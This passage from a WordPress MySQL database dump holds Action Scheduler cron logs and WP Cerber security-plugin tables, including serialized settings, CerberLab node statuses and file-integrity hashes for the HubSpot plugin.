Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(146,513,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(147,514,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(148,514,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(149,515,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(150,515,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(151,516,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(152,516,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(153,517,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(154,517,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(155,518,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(156,518,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(157,519,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(158,519,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(159,520,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(160,520,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(161,521,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(162,521,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(163,522,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(164,522,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(165,523,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(166,523,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(167,524,'action started via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51'),(168,524,'action complete via WP Cron','2023-03-22 13:12:51','2023-03-22 13:12:51');
/*!40000 ALTER TABLE `wpfi_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_cerber_files`
--

DROP TABLE IF EXISTS `wpfi_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_step` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_cerber_files`
--

LOCK TABLES `wpfi_cerber_files` WRITE;
/*!40000 ALTER TABLE `wpfi_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_cerber_sets`
--

DROP TABLE IF EXISTS `wpfi_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_cerber_sets`
--

LOCK TABLES `wpfi_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wpfi_cerber_sets` DISABLE KEYS */;
INSERT INTO `wpfi_cerber_sets` VALUES ('_cerber_off',0,'a:3:{s:7:\"Version\";s:3:\"9.0\";s:1:\"v\";i:1679252001;s:1:\"u\";i:3;}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"df6937e40bdccb130694428a2fd46695\";i:1;i:1679252090;i:4;s:40:\"SK//071QZBVCUG364E85JIMOYXL29PAHKSWDRTNF\";}',0),('garbage_collector',0,'1681924824',0),('admin_notice',0,'a:0:{}',0),('admin_message',0,'a:0:{}',0),('cerber_admin_wide',0,'',0),('_cerber_mnemosyne',0,'a:3:{i:0;s:17:\"GWIC4FMPL21YA39E6\";i:4;i:9;i:9;s:19:\"GMY0WPJ74AV5HKES3UB\";}',0),('refresh_add_on_list',0,'0',0),('boot_cerber_addons',0,'a:0:{}',0),('_check_env',0,'1677859887',0),('_cerberlab_',0,'a:3:{s:5:\"nodes\";a:9:{i:1;a:1:{s:4:\"last\";a:6:{i:0;d:0.277493000030517578125;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924281;i:4;s:4:\"http\";i:5;s:14:\"108.61.190.127\";}}i:2;a:1:{s:4:\"last\";a:6:{i:0;d:0.1486670970916748046875;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924281;i:4;s:4:\"http\";i:5;s:12:\"204.48.16.53\";}}i:3;a:1:{s:4:\"last\";a:6:{i:0;d:0.0022242069244384765625;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924281;i:4;s:4:\"http\";i:5;s:11:\"45.76.68.27\";}}i:4;a:1:{s:4:\"last\";a:6:{i:0;d:0.2791688442230224609375;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924281;i:4;s:4:\"http\";i:5;s:13:\"178.62.68.142\";}}i:5;a:1:{s:4:\"last\";a:6:{i:0;d:0.3266417980194091796875;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924282;i:4;s:4:\"http\";i:5;s:12:\"45.76.162.74\";}}i:6;a:1:{s:4:\"last\";a:6:{i:0;d:0.4430859088897705078125;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924282;i:4;s:4:\"http\";i:5;s:13:\"45.77.233.161\";}}i:7;a:1:{s:4:\"last\";a:6:{i:0;d:0.1274330615997314453125;i:1;s:6:\"Active\";i:2;b:0;i:3;i:1681924282;i:4;s:4:\"http\";i:5;s:13:\"159.203.18.45\";}}i:8;a:1:{s:4:\"last\";a:6:{i:0;d:0.002006053924560546875;i:1;i:0;i:2;s:58:\"Network error occurred while connecting to the node #8 (0)\";i:3;i:1681924282;i:4;s:4:\"http\";i:5;s:19:\"node8.cerberlab.net\";}}i:9;a:1:{s:4:\"last\";a:6:{i:0;d:0.0026071071624755859375;i:1;i:0;i:2;s:58:\"Network error occurred while connecting to the node #9 (0)\";i:3;i:1681924282;i:4;s:4:\"http\";i:5;s:19:\"node9.cerberlab.net\";}}}s:4:\"best\";i:3;s:10:\"last_check\";i:1681924282;}',0),('_cerberpush_',0,'1',1681924942),('_background_tasks',0,'a:0:{}',0),('hash_pl_e71b63e1abd427eb4044dee6ff0fccad685fae80',0,'a:4:{s:4:\"name\";s:55:\"HubSpot All-In-One Marketing - Forms, Popups, Live Chat\";s:3:\"ver\";s:7:\"10.0.25\";s:4:\"hash\";a:243:{s:13:\"changelog.txt\";s:64:\"1d77c2dcd23530619131a32a0e8561cbfd4aaf66d410420e12a133c8aafbd9fe\";s:10:\"leadin.php\";s:64:\"fb62681260bfc2fe5711484e75872d77aa5b7047722e4e10f74f4d8552feaa6e\";s:11:\"license.txt\";s:64:\"9e1e5c76e35fb51d0474aa05dfcb74ab6661008efa4f8f5b3de9493b88a42841\";s:12:\"package.json\";s:64:\"dce3dda443647ec01018f208c69efd8265fbf984c2ade9fbaa4f2b31b5b4d719\";s:16:\"phpunit.xml.dist\";s:64:\"ca89eeab9f41c6ea5a64e98c735fba8cba1740e2c239d2501d6503b33a9fa1d5\";s:9:\"readme.md\";s:64:\"f4692c08362bde14123d8ff4ee28c4497629fc302aa9d3a1ac996ec49e32bff9\";s:10:\"readme.txt\";s:64:\"c5ba767276dc8dbd2c4f566133271681abf7f548ef751c62d61d9c5fffabffc6\";s:13:\"uninstall.php\";s:64:\"6aa26f7deea453dbf3d0ede751890fdc261f85ebb8554a4af3e53987a3270eda\";s:25:\"build/elementor.asset.php\";s:64:\"8af44ccd9903a90214200c43be4e62aa98bf457dbd7367ff17bf05f9080ac3d8\";s:19:\"build/elementor.css\";s:64:\"0192e7b7342c337facdc0503da52315ea9c8bbdb0212ecd0dddd04f3b9701d6a\";s:18:\"build/elementor.js\";s:64:\"67da23c5b803ffb342dda316db284e0c06a22c850f62015d18fa226a40a9c7e7\";s:24:\"build/feedback.asset.php\";s:64:\"ec6fc09987285740753460047c2636fe791e2753f5cb1e43804e43e5145c6d0e\";s:17:\"build/feedback.js\";s:64:\"0a2a20945693f9671cbb692ed0801a17073b01ad3ab17eb069301ce2b0ae1c18\";s:25:\"build/gutenberg.asset.php\";s:64:\"09b371dc1926fc67dec13cc72aaf7e98ab26c5d6731d49fe17de1345cd24e943\";s:19:\"build/gutenberg.css\";s:64:\"e9e793148bdefe58a2fe8cc3617886a8e49c160860e4eb963108cf32b100e3fb\";s:18:\"build/gutenberg.js\";s:64:\"0f4d6c3754485c999c6a92a78d51bcc634d1552b81602900a7e456ffac0aca69\";s:22:\"build/leadin.asset.php\";s:64:\"83c3441470aa71262d22c4a7e04d7ed3f87bb0c3fb8996db0c5e64919fa0f5a7\";s:16:\"build/leadin.css\";s:64:\"33e29ed5f87cd4cf12f057327f30190af4aa67d150552106ee1be7de83937a1e\";s:15:\"build/leadin.js\";s:64:\"e4aaea5483c74afe769b7fb8e739a2477f0c4509f3feea040bd0c32991f15e55\";s:20:\"build/menu.asset.php\";s:64:\"cb37c14b749cc546bb7afa4ed072508d438c02ca51fe3a5f7c85b5dbd4b0df99\";s:13:\"build/menu.js\";s:64:\"2826d1911b719f0e348004d1140b74c6d0bb74340ca1993bc7adc7414e496c15\";s:28:\"build/reviewBanner.asset.php\";s:64:\"292bda87cdce8639d848098f32c8f29c4e88a90565ec3c3e6b7ca6eee2aa6bb8\";s:21:\"build/reviewBanner.js\";s:64:\"d4b26698ab52b9628c01cad4f20490bb1d5dfade72709ab4df05d8d79e69a9f9\";s:25:\"languages/leadin-da_DK.mo\";s:64:\"7319a644e3cf0940459cfe26582e49b0ad6fac22a14a6e1d739f99828e75e078\";s:25:\"languages/leadin-da_DK.po\";s:64:\"d6a1dbc7dd4bd0f45e103a5a7ac544c07fa458bfecf9670e423508aa2f0bd786\";s:25:\"languages/leadin-de_AT.mo\";s:64:\"172d5dfa8c86405cf54a76b1ad59a709342d0ef9e6c4a18b8d24a393873bd588\";s:25:\"languages/leadin-de_AT.po\";s:64:\"30956264824d48482ab2b7718e83b2f3adcb11def8d93df3dec689db3d3bfb9f\";s:34:\"languages/leadin-de_CH_informal.mo\";s:64:\"172d5dfa8c86405cf54a76b1ad59a709342d0ef9e6c4a18b8d24a393873bd588\";s:34:\"languages/leadin-de_CH_informal.po\";s:64:\"30956264824d48482ab2b7718e83b2f3adcb11def8d93df3dec689db3d3bfb9f\";s:25:\"languages/leadin-de_DE.mo\";s:64:\"172d5dfa8c86405cf54a76b1ad59a709342d0ef9e6c4a18b8d24a393873bd588\";s:25:\"languages/leadin-de_DE.po\";s:64:\"30956264824d48482ab2b7718e83b2f3adcb11def8d93df3dec689db3d3bfb9f\";s:32:\"languages/leadin-de_DE_formal.mo\";s:64:\"172d5dfa8c86405cf54a76b1ad59a709342d0ef9e6c4a18b8d24a393873bd588\";s:32:\"languages/leadin-de_DE_formal.po\";s:64:\"30956264824d48482ab2b7718e83b2f3adcb11def8d93df3dec689db3d3bfb9f\";s:22:\"languages/leadin-en.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:22:\"languages/leadin-en.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-en_AU.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:25:\"languages/leadin-en_AU.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-en_CA.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:25:\"languages/leadin-en_CA.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-en_GB.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:25:\"languages/leadin-en_GB.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-en_NZ.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:25:\"languages/leadin-en_NZ.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-en_US.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:25:\"languages/leadin-en_US.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-en_ZA.mo\";s:64:\"a5bea931ea28b41e7dbe32fc204c62e3ed8b77fb04f7fb623d47c4c83e941b45\";s:25:\"languages/leadin-en_ZA.po\";s:64:\"b8a1f5c4a745e410a728f7755c507fedc62cd2e7acb36cefb25117e5d5e20aaf\";s:25:\"languages/leadin-es_AR.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_AR.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_CL.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_CL.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_CO.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_CO.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_CR.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_CR.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_ES.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_ES.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_GT.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_GT.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_MX.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_MX.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_PE.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_PE.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-es_VE.mo\";s:64:\"d33a04ed0095d842b9d3190557001b262b5a1256e3e878ec4dacf96452d99276\";s:25:\"languages/leadin-es_VE.po\";s:64:\"9aa6964c332bfc66089bbd007a7c58446f9cff17c42dc1c41db77f5f7dbcab74\";s:25:\"languages/leadin-fr_BE.mo\";s:64:\"cd136e02f8ec0b7c786e176eef580ec3559c60be4439ed3cf9819601492d1692\";s:25:\"languages/leadin-fr_BE.po\";s:64:\"8940d5c17daded808aff70a4fb152182c455112e68c3f6a4fc43356a6ac8d597\";s:25:\"languages/leadin-fr_CA.mo\";s:64:\"cd136e02f8ec0b7c786e176eef580ec3559c60be4439ed3cf9819601492d1692\";s:25:\"languages/leadin-fr_CA.po\";s:64:\"8940d5c17daded808aff70a4fb152182c455112e68c3f6a4fc43356a6ac8d597\";s:25:\"languages/leadin-fr_FR.mo\";s:64:\"cd136e02f8ec0b7c786e176eef580ec3559c60be4439ed3cf9819601492d1692\";s:25:\"languages/leadin-fr_FR.po\";s:64:\"8940d5c17daded808aff70a4fb152182c455112e68c3f6a4fc43356a6ac8d597\";s:22:\"languages/leadin-ja.mo\";s:64:\"6eee071b1d826adba5b812d6f2dd872718695573da5beb9b5474d1690e33467d\";s:22:\"languages/leadin-ja.po\";s:64:\"2fad9f680e392a26508e15a3e77a824ddb78fd6a8a2ef7503d04f71efb1674b6\";s:25:\"languages/leadin-pt_AO.mo\";s:64:\"a232f260cf2fceab084d7d0269da735e2155416a3c6df9e1e848a1aca156628b\";s:25:\"languages/leadin-pt_AO.po\";s:64:\"0ea9677ed3852effbe4f0d6ac65a382c50745d1c134e1df74d9ce8ee500d3318\";s:25:\"languages/leadin-pt_BR.mo\";s:64:\"a232f260cf2fceab084d7d0269da735e2155416a3c6df9e1e848a1aca156628b\";s:25:\"languages/leadin-pt_BR.po\";s:64:\"0ea9677ed3852effbe4f0d6ac65a382c50745d1c134e1df74d9ce8ee500d3318\";s:25:\"languages/leadin-pt_PT.mo\";s:64:\"a232f260cf2fceab084d7d0269da735e2155416a3c6df9e1e848a1aca156628b\";s:25:\"languages/leadin-pt_PT.po\";s:64:\"0ea9677ed3852effbe4f0d6ac65a382c50745d1c134e1df74d9ce8ee500d3318\";s:30:\"languages/leadin-pt_PT_ao90.mo\";s:64:\"a232f260cf2fceab084d7d0269da735e2155416a3c6df9e1e848a1aca156628b\";s:30:\"languages/leadin-pt_PT_ao90.po\";s:64:\"0ea9677ed3852effbe4f0d6ac65a382c50745d1c134e1df74d9ce8ee500d3318\";s:20:\"languages/leadin.pot\";s:64:\"16e99f48a886a0362ba50423f4cc6bb60dabd6beeffc98fd9c40781000f57797\";s:30:\"public/class-assetsmanager.php\";s:64:\"2772d5c2f2a0f5c4506c89a37ef01c29e91056e736898b3836a134fc696eb139\";s:23:\"public/class-leadin.php\";s:64:\"287d4a283503d80596c9dee7cd94a9f7c74ca361debba9ef109fa76d27a7954b\";s:26:\"public/class-pagehooks.php\";s:64:\"ac52bc473066028d2efb9e7fd94afb9d5878896035ed18b632bc3ac6f3c9ea7f\";s:37:\"public/admin/class-adminconstants.php\";s:64:\"815d4fbec05b67a71e49475fc9d600ff85ba6bd6ca67854186d1c9302180d375\";s:33:\"public/admin/class-connection.php\";s:64:\"5a5421119b540f2208ffbeae3223d6b97104ff06e77fb03c09c80ef19166b2b4\";s:39:\"public/admin/class-deactivationform.php\";s:64:\"7adc74e5edcdfbe4e6ea7bb05e2e049d8c3b31a0952f2720d04e08b73a0af28a\";s:32:\"public/admin/class-gutenberg.php\";s:64:\"703c8dc3050f422da7d3d725aef26597d34929a55ce4361aa7693abea9461a12\";s:35:\"public/admin/class-iframeroutes.php\";s:64:\"b2a505ed46affcbcf722a4f914fa1c4d1fe0ad5858887743ccc31c874e8c87fe\";s:29:\"public/admin/class-impact.php\";s:64:\"4f265088b213fda3a7d0a3370b9da68826bd76fe59cc6e0f3d335cc7e053a2c1\";s:34:\"public/admin/class-leadinadmin.php\";s:64:\"87e9bd71594d9f4f1603905b299596e4f386ff6b4a0fe00f40f376cb7086cc77\";s:28:\"public/admin/class-links.php\";s:64:\"206f64f8e8b110887ff2ac3455998113ba2988000b15b586b4ef45a4368df108\";s:36:\"public/admin/class-menuconstants.php\";s:64:\"882f73a2171819713901cc9d5ebe327ade7adc0dcd698c8a9a065a525033ae7e\";s:36:\"public/admin/class-noticemanager.php\";s:64:\"5d6024af6805629e0b5dfbcc07b3b93ebbd136d86e316c55ea0b9deb2b1f49b3\";s:43:\"public/admin/class-pluginactionsmanager.php\";s:64:\"e92301ef4f4d6d76761bf58b9f3f5a8ea7fed131dabf107e3d5bd7f9e9c98ca3\";s:35:\"public/admin/class-reviewbanner.php\";s:64:\"62885a2f388131d074234f822d0694f36edafc1a848b1aeccf983c1f1ab6f58a\";s:39:\"public/admin/class-reviewcontroller.php\";s:64:\"0acfd8d610f41e7a3463191e729cde61c740ea5d4f04b87cc2df1e6035c8ca12\";s:30:\"public/admin/class-routing.php\";s:64:\"255632fa157298c42bd8a7bf905458316e38b29af7799d9ccab50d53a7e1a6a2\";s:56:\"public/admin/modules/api/class-hublet-api-controller.php\";s:64:\"8c63d93f117940dd1dde714219746d1d6125b6565f67c0aa47b4b8802398f5f0\";s:67:\"public/admin/modules/api/class-internal-tracking-api-controller.php\";s:64:\"1cdbed4abdca3a6ea1090f903ca6fb92835e127e129697e1705047d8cc11d79e\";s:56:\"public/admin/modules/api/class-portal-api-controller.php\";s:64:\"97e68d481cc3b20b09e67f235530264361d430a9842ae467801b6adc39ef4758\";s:59:\"public/admin/modules/api/class-user-meta-api-controller.php\";s:64:\"9f0406a9a14e3cfbd1812609f0beb6238e0ea32406861d4d8f36e050d9c3e445\";s:57:\"public/admin/modules/client/class-contacts-api-client.php\";s:64:\"3e44c795b4114031b86ac6ba9ee164d4d87f8720b90009dcc7407411674b64d5\";s:44:\"public/admin/widgets/class-elementorform.php\";s:64:\"d67bade6bc999b0ddd2740654ab6d2e1295e47cdffd9e0ecee06969e6819e8d8\";s:50:\"public/admin/widgets/class-elementorformselect.php\";s:64:\"b5d90df2bc6734cdfcea004099ab5755c0bb003f80012d28bd0d87ed02fe9dd8\";s:47:\"public/admin/widgets/class-elementormeeting.php\";s:64:\"5109ccae28b89b174cc19643afe484d699d95d3cc662250b4ffae54b64b60f3b\";s:53:\"public/admin/widgets/class-elementormeetingselect.php\";s:64:\"a7a747aa2afa57f665ab27e49cec242a16dc96ce144b4d012b5cae540d7e4e1d\";s:38:\"public/assets/images/external_link.svg\";s:64:\"a5cf6f4c303b88e249aed0a5dca9483c3ab76453cd4d5b105d06c5e1216568b7\";s:37:\"public/assets/images/hubspot-form.png\";s:64:\"b539246409ec77c58717cd6506b9fe12b62053b9a21e50000f618bd5207ec8bc\";s:41:\"public/assets/images/hubspot-meetings.png\";s:64:\"66c08c7d1ac64182d943d227e92f695b0193c9b0a9730c32fae143398277fb66\";s:45:\"public/assets/images/hubspot-team-profile.png\";s:64:\"d3544e40b590a55fad95f46c42801e350aa23ef6279c9533bf89929231d2d792\";s:41:\"public/assets/images/hubspot-wordmark.svg\";s:64:\"07208aa1563484557bf5a5f58304e8d6361c52e719c5ac8256cb3a2faf108ef6\";s:32:\"public/assets/images/hubspot.svg\";s:64:\"7157ed90562b2fa6a3e9fbb2685e3da482ef973e945fd906f597f9add1cebc91\";s:37:\"public/assets/images/loading-dots.svg\";s:64:\"08516ff8be4a573cefdf46a0c6a443319179c24c03b68613a8ee79e0f2f522b9\";s:33:\"public/assets/images/sprocket.svg\";s:64:\"fac5962269e14f8fc9952f9224e85c0a264e0734a899b2ebd7c9a6599200b042\";s:37:\"public/assets/style/leadin-bridge.css\";s:64:\"32410dde45de6bbed0d308e20755ce4a62397cb1ad300405b649aba57ba5e6ee\";s:39:\"public/assets/style/leadin-feedback.css\";s:64:\"a72d8afe8253c0bfe86256dbc8cfa3af5c045e65444f25468f8e7c2e93b2c61f\";s:30:\"public/assets/style/leadin.css\";s:64:\"f1dd9c36b5b71dcb570c924612a062065f02fa93a2ed2cc61b454baef32e32e8\";s:47:\"public/assets/style/fonts/LexendDeca-Bold.woff2\";s:64:\"76bcaafcb75ddaaaa0799fa372be253c8421020dcacab918a59a2b12475437bf\";s:48:\"public/assets/style/fonts/LexendDeca-Light.woff2\";s:64:\"e07659d8ab7dcada320134e744176947ca18e9e1cd094081764c1d0cd9af1b7e\";s:49:\"public/assets/style/fonts/LexendDeca-Medium.woff2\";s:64:\"28e859a343b92d20c6a2fa4424bbdf166ea01d0f479d719823d68872d68103cd\";s:51:\"public/assets/style/fonts/LexendDeca-SemiBold.woff2\";s:64:\"c1c036584fd4b67f626534b37eef7a19ecf8954e478e78d0329248f2286126e7\";s:37:\"public/assets/style/fonts/hs-font.svg\";s:64:\"7947f4e2575a3a65143f267d050d28db02c28be6c84e39876758f394b7dc93e2\";s:38:\"public/assets/style/fonts/hs-font.woff\";s:64:\"f030d5d5558628fa7d3979b10313bff6d01d85246ffc7e3e79c4dd8107638c69\";s:27:\"public/auth/class-oauth.php\";s:64:\"94dcab6149087ac0a4cfa680eeb5974be1f7e74c71b884086628f64e4a9b7de3\";s:33:\"public/auth/class-oauthcrypto.php\";s:64:\"7312912c7c610171ef10cee5f5bf028baaa05ba3b1ffc1bce445f981a672ce94\";s:29:\"public/data/class-filters.php\";s:64:\"3ca67dceca5dd71eb8cb9a6dc32a6e83ef33d8069dd1311f57dd1df8cfc27167\";s:36:\"public/data/class-portal-options.php\";s:64:\"b9fd91efe19e9fe81d18b93e1067293520c584d1547ce10fc6175628976bd08e\";s:35:\"public/data/class-user-metadata.php\";s:64:\"9e3f3f58c09f4cf4489dd506afb982de762855c24ebb57a48219cbd1e551ed2b\";s:26:\"public/data/class-user.php\";s:64:\"2933617be5ea7a5b218cd49233ff4c8083e24b35f4c2c0936f6d8d93b81e572e\";s:30:\"public/includes/api-loader.php\";s:64:\"53cef9467704e58c6cc0cc5dcbaaaa2bcc0c4ff9f4e6e6d38907cd3f43fac63a\";s:48:\"public/modules/api/class-base-api-controller.php\";s:64:\"bda36caf00515cc3dd8afa52361e68fab506bc657555484b71c3d7485f63b7b3\";s:55:\"public/modules/api/class-healthcheck-api-controller.php\";s:64:\"664db7d18557afb57efaf2dd8e0752cc1fad8738086982a85b0cfe9eccc72fa2\";s:49:\"public/modules/api/class-oauth-api-controller.php\";s:64:\"21c777f6791ed5e2fcf6411dc5287485d9ca66d439a9bd02d4098b7596a145c7\";s:49:\"public/modules/api/class-proxy-api-controller.php\";s:64:\"e6eb5f38dcb9ea883777fbcf3621ad8af5c27d163577e7c973c7b9263beac95b\";s:55:\"public/modules/client/class-access-token-api-client.php\";s:64:\"bc08fe371115c3a1dbfcc3437670c0686eb4af2450499102035780bd7a701b9f\";s:55:\"public/modules/client/class-hubspot-base-api-client.php\";s:64:\"6e0b6902762a35b128c4ea5209346e06fe752914ea524113156b7ebbac98f4b2\";s:38:\"public/utils/class-queryparameters.php\";s:64:\"3f96e560620ab511c3e7692631fa9ea3f85e668233ffa8a024483febc2e53e3d\";s:35:\"public/utils/class-requestutils.php\";s:64:\"1ea0ff0027f0bff8b7b5ed715710941656e3413b8532de1a7b514adbd5bbf038\";s:43:\"public/utils/class-shortcoderenderutils.php\";s:64:\"ed241e88a45ae1d397250e1d9f58dc40157f1adf704d315254cf1b620ac42a2c\";s:31:\"public/utils/class-versions.php\";s:64:\"be22939d8a2971de914e7364db6e8fb009c7509c8fb2934366ec51a04730acaa\";s:30:\"public/wp/class-filesystem.php\";s:64:\"c2347fd4368282b9c7dcf262022eba48d41798842f3875d5e95f12a66b38e44f\";s:24:\"public/wp/class-page.php\";s:64:\"c6346406ad4ad7e881520bc25c60d7ae5cecd55bf9f577d1b3162874b57313bb\";s:21:\"scripts/navigation.ts\";s:64:\"13de7a13509467cd69a8d3ee7c464d3b00a172f65d5a5e806eb8ef62d67de794\";s:31:\"scripts/api/hubspotApiClient.ts\";s:64:\"d83370d66bd5388813cce3c5f8398d07492eff1ce6d0c18802d029ebdd476da9\";s:31:\"scripts/api/hubspotPluginApi.ts\";s:64:\"dcaab6c8aa2c58f0aa232c71b2506168fb9628e7e12136e65c3439027ea4b401\";s:33:\"scripts/api/wordpressApiClient.ts\";s:64:\"953b3303d6097284d0917c1ce701b4a735438bc9f77f1601e9f5f03fd7cb20f6\";s:41:\"scripts/api/wordpressMeetingsApiClient.ts\";s:64:\"bd45a13ae56b6f51d5cddfcb2488d024ad9bc6cce590489ce2481f4c0ed481cd\";s:39:\"scripts/constants/defaultFormOptions.ts\";s:64:\"0c6a0fb49b994faa1bcc5c35c752fc9aa9e6b6fdad748f69fab9